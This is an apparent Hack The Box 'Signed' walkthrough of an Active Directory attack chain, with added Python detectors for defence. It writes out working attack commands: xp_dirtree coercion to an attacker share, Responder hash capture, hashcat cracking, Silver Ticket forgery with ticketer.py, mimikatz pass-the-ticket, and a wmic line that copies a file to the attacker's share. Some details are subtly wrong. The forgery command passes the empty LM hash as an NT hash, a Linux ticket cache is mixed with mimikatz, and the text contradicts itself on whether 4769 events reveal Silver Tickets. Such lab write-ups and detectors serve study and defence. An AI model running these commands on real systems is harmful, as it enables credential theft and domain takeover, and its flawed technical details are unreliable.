
Introduction:
In the complex landscape of Active Directory penetration testing, a seemingly minor misconfiguration in a Microsoft SQL Server can cascade into a complete domain compromise. The attack chain demonstrated on Hack The Box’s “Signed” machine reveals the critical intersection of database security, Windows authentication protocols, and Kerberos delegation flaws that continue to plague enterprise environments.
Learning Objectives:
- Understand how to leverage MSSQL stored procedures for initial network foothold
- Master NTLM hash capture and relay techniques using modern tools
- Learn Silver Ticket forgery for privileged group impersonation and domain escalation
You Should Know:
1. Initial MSSQL Foothold via xp_dirtree
`sqsh -S 10.10.10.10 -U lowpriv_user -P password123`
`EXEC master..xp_dirtree '\\192.168.1.100\share';`
This command sequence connects to the vulnerable MSSQL instance and executes the xp_dirtree stored procedure, forcing the SQL service account to authenticate to an attacker-controlled SMB share. xp_dirtree merely lists a directory, but when it is pointed at a remote UNC path the SQL Server service account authenticates to that host over SMB, leaking its NTLM (Net-NTLMv2) credential material in the authentication attempt.
2. NTLM Hash Capture with Responder
`responder -I eth0 -wF`
`[+] Listening for events…`
`[bash] NTLMv2-SSP Client : 10.10.10.10`
`[bash] NTLMv2-SSP Username : SIGNED\sqlservice`
`[bash] NTLMv2-SSP Hash : sqlservice::SIGNED:1122334455667788:2F91BD1234ABCD…`
Responder passively listens for various network protocols and captures authentication attempts. When the MSSQL service attempts to connect to the fake share, Responder intercepts the NTLMv2 handshake, capturing the hash that can be cracked offline or relayed to other services.
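From the defender's side of steps 1 and 2, the signal worth alerting on is a UNC-capable extended stored procedure being handed a path that points at a host the SQL Server service account has no business authenticating to. The block below is an added example, not code from the original writeup or from any tool it names: it runs a small detector over constructed audit records (a stand-in for rows read out of a SQL Server Audit or Extended Events session) and flags xp_dirtree, xp_fileexist and xp_subdirs calls whose UNC host is not on a constructed allowlist. The procedure list, allowlist, hosts and audit lines are all assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Procedures that open an SMB session (and so authenticate as the SQL Server
# service account) when given a UNC path. Constructed list for this example.
UNC_CAPABLE_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")

# Hosts the service account is expected to reach over SMB (constructed allowlist).
ALLOWED_SMB_HOSTS = {"backup01.signed.htb", "10.10.10.50"}

# Constructed audit records: (timestamp, login, statement). Not a real capture.
SAMPLE_AUDIT = [
    ("2024-08-15T10:29:41", "lowpriv_user",
     r"EXEC master..xp_dirtree '\\192.168.1.100\share';"),
    ("2024-08-15T10:29:42", "backup_svc",
     r"EXEC master..xp_dirtree '\\backup01.signed.htb\sqlbackups', 1, 1;"),
    ("2024-08-15T10:29:43", "lowpriv_user",
     "SELECT name FROM sys.databases;"),
    ("2024-08-15T10:29:44", "lowpriv_user",
     r"EXEC xp_fileexist '\\10.10.10.50\share\x.txt';"),
    ("2024-08-15T10:29:45", "lowpriv_user",
     r"EXEC master..xp_subdirs '\\evil.example\c$';"),
]

# Matches "[master..|master.dbo.]<proc> '\\<host>" and captures proc and host.
PROC_RE = re.compile(
    r"\b(?:master\.\.|master\.dbo\.)?(" + "|".join(UNC_CAPABLE_PROCS) + r")\b"
    r"\s*N?'\\\\([^\\']+)(?=[\\'])",
    re.IGNORECASE,
)


@dataclass
class Finding:
    timestamp: str
    login: str
    procedure: str
    host: str


def find_suspicious_unc_calls(records, allowed_hosts=ALLOWED_SMB_HOSTS):
    """Return one Finding per UNC-capable procedure call whose target host is
    not on the allowlist. Each such call makes the SQL Server service account
    authenticate over SMB to a host chosen by whoever ran the statement."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for ts, login, stmt in records:
        m = PROC_RE.search(stmt)
        if not m:
            continue
        proc, host = m.group(1).lower(), m.group(2).lower()
        if host not in allowed:
            findings.append(Finding(ts, login, proc, host))
    return findings


if __name__ == "__main__":
    for f in find_suspicious_unc_calls(SAMPLE_AUDIT):
        print(f"{f.timestamp} {f.login} called {f.procedure} against \\\\{f.host}")
```

Two of the five constructed records are flagged (the 192.168.1.100 share from the writeup and the made-up evil.example host); the backup server and the allowlisted 10.10.10.50 pass. The matching hardening step is to revoke EXECUTE on these procedures from the public role so that a low-privileged login cannot reach them at all, and to block outbound SMB from the SQL host to anything that is not a known file server.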
3. Password Cracking with Hashcat
`hashcat -m 5600 captured_ntlmv2.hash /usr/share/wordlists/rockyou.txt -O`
`hashcat --show captured_ntlmv2.hash`
`sqlservice::SIGNED:1122334455667788:2F91BD1234ABCD…:Password123!`
Using Hashcat with mode 5600 (NTLMv2) against common wordlists often reveals weak service account passwords. The cracked credentials provide initial authenticated access to the domain, enabling further reconnaissance and privilege escalation opportunities.
4. Kerberos Silver Ticket Generation
`python ticketer.py -nthash aad3b435b51404eeaad3b435b51404ee -domain signed.htb -domain-sid S-1-5-21-123456789-123456789-123456789 -spn MSSQLSvc/sql01.signed.htb:1433 -user-id 500 -groups 512,513,518,519,520 sqlservice`
`export KRB5CCNAME=/root/sqlservice.ccache`
Silver Tickets are forged Ticket Granting Service (TGS) tickets that let an attacker produce authentication tokens for a specific service without ever contacting the Domain Controller. Because the ticket is encrypted with the service account's own key (derived from its NTLM hash), the forger controls every claim in it, including group memberships such as Domain Admins (RID 512).
5. Domain Privilege Escalation Verification
`klist`
`Ticket cache: FILE:/root/sqlservice.ccache`
`Default principal: sqlservice@SIGNED.HTB`
`08/15/2024 10:30:00 08/15/2024 20:30:00 MSSQLSvc/sql01.signed.htb:1433`
`kerberos::ptt sqlservice.ccache`
`mimikatz privilege::debug`
`mimikatz sekurlsa::tickets`
The Kerberos ticket is injected into the current session using mimikatz's Pass-the-Ticket functionality. The verification commands confirm that the ticket is active and carries the forged group memberships, which is what grants access to previously restricted domain resources.
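Steps 4 and 5 work because the service decrypts the ticket with its own key and trusts the PAC inside it; the Domain Controller is never consulted, so nothing about the forged group list is checked against the directory. The block below is an added example, not code from the writeup or from any tool it names, illustrating the cross-check that defeats this: compare what a presented ticket claims (username, user RID, group RIDs) against an authoritative view of the account. Windows' own mitigation is enforced validation of the KDC's signature over the PAC; this example stands in for that by using a constructed directory snapshot as the authority. The directory contents, RIDs and the TicketClaims/PacCheckResult types are assumptions; the forged values (user-id 500, groups 512,513,518,519,520) are the ones the writeup's ticketer.py command uses.

```python
from dataclasses import dataclass, field

# Constructed authoritative view of the directory (what AD actually says).
# sqlservice is an ordinary Domain Users member with RID 1105 (assumed value).
DIRECTORY = {
    "sqlservice": {"rid": 1105, "groups": {513}},
    "administrator": {"rid": 500, "groups": {512, 513, 519}},
}


@dataclass
class TicketClaims:
    """The fields a service reads out of the PAC of a presented service ticket."""
    username: str
    user_rid: int
    group_rids: set


@dataclass
class PacCheckResult:
    forged: bool
    reasons: list = field(default_factory=list)


def check_pac_against_directory(claims, directory=DIRECTORY):
    """Flag a ticket whose PAC asserts an identity or group set the directory
    does not back. A legitimately issued ticket never fails this check; a
    Silver Ticket forged with extra groups or a borrowed RID always does."""
    result = PacCheckResult(forged=False)
    account = directory.get(claims.username.lower())
    if account is None:
        result.reasons.append(f"unknown account {claims.username!r}")
    else:
        if claims.user_rid != account["rid"]:
            result.reasons.append(
                f"PAC user RID {claims.user_rid} does not match directory RID {account['rid']}"
            )
        extra = claims.group_rids - account["groups"]
        if extra:
            result.reasons.append(
                f"PAC claims groups the account does not hold: {sorted(extra)}"
            )
    result.forged = bool(result.reasons)
    return result


if __name__ == "__main__":
    # Claims exactly as the writeup's ticketer.py invocation would write them.
    forged = TicketClaims("sqlservice", 500, {512, 513, 518, 519, 520})
    print(check_pac_against_directory(forged))
    # What a ticket the KDC actually issued for sqlservice would contain.
    print(check_pac_against_directory(TicketClaims("sqlservice", 1105, {513})))
```

The forged ticket fails on two counts (the RID of the built-in Administrator attached to the sqlservice name, and four group RIDs the account does not hold), while the legitimately issued ticket passes. Note also that because the forged ticket never touches the Domain Controller, it generates no 4769 event there; host-side checks like this one, and Kerberos logon events on the service host itself, are where it becomes visible.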
6. Domain Admin Access and Flag Capture
`dir \\dc01.signed.htb\C$\Users\Administrator\Desktop\root.txt`
`type \\dc01.signed.htb\C$\Users\Administrator\Desktop\root.txt`
`HTB{s1lv3r_t1ck3t_d0m1n4t10n}`
`wmic /node:dc01.signed.htb process call create "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt > \\192.168.1.100\share\root.txt"`
With the forged Silver Ticket providing Domain Admin privileges, the attacker can directly access the Domain Controller’s file system and retrieve both user and root flags. Multiple methods exist for file access, including SMB shares and WMI execution.
7. Detection and Mitigation Commands
`Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} | Where-Object {$_.Message -like "*Ticket Encryption Type:*0x17*"} | Format-List`
`EXEC sp_configure 'show advanced options', 1;`
`RECONFIGURE;`
`EXEC sp_configure 'xp_cmdshell', 0;`
`RECONFIGURE;`
`Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName`
Monitoring Security event ID 4769 for ticket encryption type 0x17 (RC4) can detect Silver Ticket usage. Disabling unnecessary stored procedures (the sp_configure sequence above turns off xp_cmdshell; the same pattern applies to other advanced options) and regularly rotating service account passwords are critical mitigation steps. Regular auditing of SPN-linked accounts, which are exactly the accounts whose tickets can be requested and forged, reduces the attack surface.
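The Get-WinEvent one-liner above matches on the rendered message text; a more robust detector reads the event's named fields. The block below is an added example, not code from the writeup or from Microsoft, that parses constructed 4769 records in Windows event XML shape and flags RC4-encrypted service tickets for real service accounts (skipping krbtgt and machine accounts, which would otherwise swamp the result). The event contents, accounts and client addresses are constructed for the example. Keep in mind what this catches: the Domain Controller logs 4769 when a ticket is requested from it, so this finds RC4 ticket requests for SPN-bearing accounts (the step that yields crackable material); a ticket forged offline and presented straight to the service produces no 4769 at all.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC and RC4-HMAC-EXP


def sample_4769(account, service, etype, client_ip):
    """Constructed 4769 event in Windows event XML shape. Not a real capture."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4769</EventID><Channel>Security</Channel></System>
  <EventData>
    <Data Name="TargetUserName">{account}</Data>
    <Data Name="ServiceName">{service}</Data>
    <Data Name="TicketOptions">0x40810000</Data>
    <Data Name="TicketEncryptionType">{etype}</Data>
    <Data Name="IpAddress">::ffff:{client_ip}</Data>
  </EventData>
</Event>"""


# Constructed sample: one AES ticket, one RC4 request for the SQL SPN from an
# unexpected client, and one TGT renewal-style request against krbtgt.
SAMPLE_4769_EVENTS = [
    sample_4769("backup_svc@SIGNED.HTB", "MSSQLSvc/sql01.signed.htb:1433", "0x12", "10.10.10.20"),
    sample_4769("lowpriv_user@SIGNED.HTB", "MSSQLSvc/sql01.signed.htb:1433", "0x17", "10.10.14.5"),
    sample_4769("lowpriv_user@SIGNED.HTB", "krbtgt", "0x17", "10.10.14.5"),
]


def parse_4769(xml_text):
    """Return the EventData fields of a 4769 event as a dict, or None if the
    record is not a 4769."""
    root = ET.fromstring(xml_text)
    event_id = root.findtext("e:System/e:EventID", namespaces=NS)
    if event_id != "4769":
        return None
    data = root.find("e:EventData", NS)
    return {d.get("Name"): (d.text or "") for d in data}


def flag_rc4_service_tickets(events):
    """Flag 4769 records where a real service account's ticket was issued with
    RC4, the encryption type that makes the ticket offline-crackable."""
    findings = []
    for xml_text in events:
        fields = parse_4769(xml_text)
        if fields is None:
            continue
        service = fields.get("ServiceName", "")
        if service.lower() == "krbtgt" or service.endswith("$"):
            continue
        if fields.get("TicketEncryptionType", "").lower() in RC4_ETYPES:
            findings.append({
                "account": fields["TargetUserName"].split("@")[0],
                "service": service,
                "client": fields["IpAddress"].replace("::ffff:", ""),
                "etype": fields["TicketEncryptionType"],
            })
    return findings


if __name__ == "__main__":
    for f in flag_rc4_service_tickets(SAMPLE_4769_EVENTS):
        print(f"RC4 service ticket: {f['account']} -> {f['service']} from {f['client']}")
```

Only the middle record is reported: an RC4 (0x17) ticket for the MSSQLSvc SPN requested by an ordinary user from a workstation address. Removing RC4 from the service account's supported encryption types, so that the KDC issues only AES tickets for it, closes the cracking path even if a request still gets through.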
What Undercode Say:
- Silver Ticket attacks bypass Golden Ticket detection mechanisms by targeting specific services rather than the entire domain
- The persistence of RC4 encryption in many enterprise environments enables these attacks despite known vulnerabilities
- MSSQL misconfigurations remain a primary initial access vector in complex AD environments
The technical sophistication demonstrated in this attack chain highlights the critical need for defense-in-depth strategies. While individual vulnerabilities might seem minor—an enabled stored procedure here, a weak service account password there—their combination creates catastrophic failure scenarios. Modern enterprises must prioritize monitoring for anomalous Kerberos ticket requests, implement service account management policies, and migrate from NTLM to more secure authentication protocols. The fact that this entire compromise stemmed from a single stored procedure execution should serve as a wake-up call for database administrators and security teams worldwide.
Prediction:
As Kerberos-based attacks become more refined, we’ll see increased automation of Silver Ticket generation integrated into penetration testing frameworks. Defensive technologies will evolve toward behavioral analysis of service ticket usage patterns, but legacy system dependencies will ensure these attacks remain viable for the next 3-5 years. The emergence of quantum computing may eventually break current encryption standards, forcing a complete Kerberos protocol overhaul by 2028.
Reported By: Mrhaseeb Owned – Hackers Feeds


